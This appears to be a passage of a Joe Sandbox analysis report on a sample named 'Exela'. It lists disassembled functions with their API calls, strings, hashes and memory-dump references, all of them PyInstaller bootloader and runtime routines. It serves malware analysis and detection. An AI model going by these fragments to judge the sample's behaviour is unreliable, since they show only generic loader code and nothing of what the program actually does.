                                                                                                    • Instruction ID: daacebb6bab56183e429a75c802b04264cf0a841dce7126223a33933d15c84f3
                                                                                                    • Opcode Fuzzy Hash: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
                                                                                                    • Instruction Fuzzy Hash: 79417321A087669AFB10FB2198469B9E390FF44794FCC4572EE5D07B95DE3CE5418720
                                                                                                    Function 00007FF75AE9EA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                    • String ID: csm$csm$csm
                                                                                                    • API String ID: 849930591-393685449
                                                                                                    • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                    • Instruction ID: 0a5312119986de2a4ae3356448189989bfb133cf6c10d7e5d1f2137b66254517
                                                                                                    • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                    • Instruction Fuzzy Hash: 0CD17D62A087618AFB20BB25D4427ADA7A0FF45798F980176EF4D57B95DF38E480C720
                                                                                                    Function 00007FF75AE92C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF75AE93706,?,00007FF75AE93804), ref: 00007FF75AE92C9E
                                                                                                    • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF75AE93706,?,00007FF75AE93804), ref: 00007FF75AE92D63
                                                                                                    • MessageBoxW.USER32 ref: 00007FF75AE92D99
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$CurrentFormatProcess
                                                                                                    • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                    • API String ID: 3940978338-251083826
                                                                                                    • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                    • Instruction ID: 959f39bb468789a468f54dddd02ae54de8f0dc4e02315a1adbe7011854c44fda
                                                                                                    • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                    • Instruction Fuzzy Hash: C0310822B08B6146FB20BB25B8156BBA695BF887C8F844135EF4D93759EF3CD506C710
                                                                                                    Function 00007FF75AE9DD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF75AE9DFEA,?,?,?,00007FF75AE9DCDC,?,?,?,00007FF75AE9D8D9), ref: 00007FF75AE9DDBD
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF75AE9DFEA,?,?,?,00007FF75AE9DCDC,?,?,?,00007FF75AE9D8D9), ref: 00007FF75AE9DDCB
                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF75AE9DFEA,?,?,?,00007FF75AE9DCDC,?,?,?,00007FF75AE9D8D9), ref: 00007FF75AE9DDF5
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF75AE9DFEA,?,?,?,00007FF75AE9DCDC,?,?,?,00007FF75AE9D8D9), ref: 00007FF75AE9DE63
                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF75AE9DFEA,?,?,?,00007FF75AE9DCDC,?,?,?,00007FF75AE9D8D9), ref: 00007FF75AE9DE6F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                    • String ID: api-ms-
                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                    • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                    • Instruction ID: 70f55dac4288e69f14614064eb164a04cbd27b1be7e9a2bf35709ba27e867ea7
                                                                                                    • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                    • Instruction Fuzzy Hash: 4C318B21B1A76699FE12BB02A842975A394FF58BA0FCD4675EE1D46380EF3CE4448230
                                                                                                    Function 00007FF75AE96350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess
                                                                                                    • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                    • API String ID: 2050909247-2434346643
                                                                                                    • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                    • Instruction ID: 42dc910226e0dc196919365218f4cb73e4c3f8ff7adc36aeca7154002c201508
                                                                                                    • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                    • Instruction Fuzzy Hash: 27419231A1C79795FA11FB60E4566E9A310FF88384FC80172EA5C53296EF3CE905C760
                                                                                                    Function 00007FF75AE92A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF75AE9351A,?,00000000,00007FF75AE93F23), ref: 00007FF75AE92AA0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess
                                                                                                    • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                    • API String ID: 2050909247-2900015858
                                                                                                    • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                    • Instruction ID: 104efb88683b7cc3f511a7c5883d8de4f14563315119a7727c20c07082a29446
                                                                                                    • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                    • Instruction Fuzzy Hash: 7221A132A1879186F720FB50B8467E6A394FF883C4F844172EE8C53659DF3CD5458750
                                                                                                    Function 00007FF75AEAB1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 2506987500-0
                                                                                                    • Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                    • Instruction ID: ba8b0cf157a6c32acbdf2a6c46c18d5112196af08dbe314014990bb34dddbea8
                                                                                                    • Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                    • Instruction Fuzzy Hash: 04219F20F0C26681FA687365666B17DE1425F447B0FCC87B5D87E07AD6DE2CAC008330
                                                                                                    Function 00007FF75AEB7DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                    • String ID: CONOUT$
                                                                                                    • API String ID: 3230265001-3130406586
                                                                                                    • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                    • Instruction ID: 2c81a9dbc2c33c5e6d231d570e7c84dd3b2bbe5d00d45cdf34c4e5d48f380132
                                                                                                    • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                    • Instruction Fuzzy Hash: AE118121A18B5586F350BB56F85A329B2A4FF88BE4F884374EA5D877A4DF3CD8048750
                                                                                                    Function 00007FF75AE98560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF75AE99216), ref: 00007FF75AE98592
                                                                                                    • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF75AE99216), ref: 00007FF75AE985E9
                                                                                                      • Part of subcall function 00007FF75AE99400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF75AE945E4,00000000,00007FF75AE91985), ref: 00007FF75AE99439
                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF75AE99216), ref: 00007FF75AE98678
                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF75AE99216), ref: 00007FF75AE986E4
                                                                                                    • FreeLibrary.KERNEL32(?,?,00000000,00007FF75AE99216), ref: 00007FF75AE986F5
                                                                                                    • FreeLibrary.KERNEL32(?,?,00000000,00007FF75AE99216), ref: 00007FF75AE9870A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 3462794448-0
                                                                                                    • Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                    • Instruction ID: cdfa6a96291e7e34f18fbfe516444fb18322a8224da3d27bdaff509dc0fe0cd1
                                                                                                    • Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                    • Instruction Fuzzy Hash: 9141C462B1879249FB30BF11A446AAAA794FF84BC4F880175DF8D97B99DE3CD401C720
                                                                                                    Function 00007FF75AEAB338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF75AEA4F81,?,?,?,?,00007FF75AEAA4FA,?,?,?,?,00007FF75AEA71FF), ref: 00007FF75AEAB347
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEA4F81,?,?,?,?,00007FF75AEAA4FA,?,?,?,?,00007FF75AEA71FF), ref: 00007FF75AEAB37D
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEA4F81,?,?,?,?,00007FF75AEAA4FA,?,?,?,?,00007FF75AEA71FF), ref: 00007FF75AEAB3AA
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEA4F81,?,?,?,?,00007FF75AEAA4FA,?,?,?,?,00007FF75AEA71FF), ref: 00007FF75AEAB3BB
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEA4F81,?,?,?,?,00007FF75AEAA4FA,?,?,?,?,00007FF75AEA71FF), ref: 00007FF75AEAB3CC
                                                                                                    • SetLastError.KERNEL32(?,?,?,00007FF75AEA4F81,?,?,?,?,00007FF75AEAA4FA,?,?,?,?,00007FF75AEA71FF), ref: 00007FF75AEAB3E7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 2506987500-0
                                                                                                    • Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                    • Instruction ID: 48c53db4bde8173b0a260965429a9b6dc620d5db89f6430af7bf9dd2a7dc8010
                                                                                                    • Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                    • Instruction Fuzzy Hash: 4A11A530B0D3A286FA54732156AB17DE1429F447B0FCC87B4D87E477C6DE6CA8018321
                                                                                                    Function 00007FF75AE92910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF75AE91B6A), ref: 00007FF75AE9295E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess
                                                                                                    • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                    • API String ID: 2050909247-2962405886
                                                                                                    • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                    • Instruction ID: 463e3f84d6fc8cba43a1c3aac15551f7fe014ca6b74a80956e717a4faaaa7aa3
                                                                                                    • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                    • Instruction Fuzzy Hash: 71313823B1879156F720B761A8426E6A294BF887D4F844172FE8D83745EF3CD546C720
                                                                                                    Function 00007FF75AE92390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                    • String ID: Unhandled exception in script
                                                                                                    • API String ID: 3081866767-2699770090
                                                                                                    • Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                    • Instruction ID: 27f75de02e02f740de3505eef975b10c5753f190785946dfa57723bbaa08ed94
                                                                                                    • Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                    • Instruction Fuzzy Hash: 7E315D62619B928DFB20FB21E85A2FAA360FF88784F884175EA4D47A59DF3CD5008710
                                                                                                    Function 00007FF75AE92B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF75AE9918F,?,00007FF75AE93C55), ref: 00007FF75AE92BA0
                                                                                                    • MessageBoxW.USER32 ref: 00007FF75AE92C2A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentMessageProcess
                                                                                                    • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                    • API String ID: 1672936522-3797743490
                                                                                                    • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                    • Instruction ID: 5a7828566d2126cd1d65a2fd55e8acbe7a6927e22cbef60365649d5fa86da71a
                                                                                                    • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                    • Instruction Fuzzy Hash: 5D21AE62B08B5196F720BB14F8467EAA3A4FF88780F844136EE8D57759EE3CD605C750
                                                                                                    Function 00007FF75AE92710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF75AE91B99), ref: 00007FF75AE92760
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess
                                                                                                    • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                    • API String ID: 2050909247-1591803126
                                                                                                    • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                    • Instruction ID: 69ae4843d4b8edf228c67872d48751448eeab6a042949abcefdd71ae468921de
                                                                                                    • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                    • Instruction Fuzzy Hash: 4521AE32A18B9196F720FB50B8867E6A3A4EF88384F884171FE8C53659DF3CD5458750
                                                                                                    Function 00007FF75AEA9AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
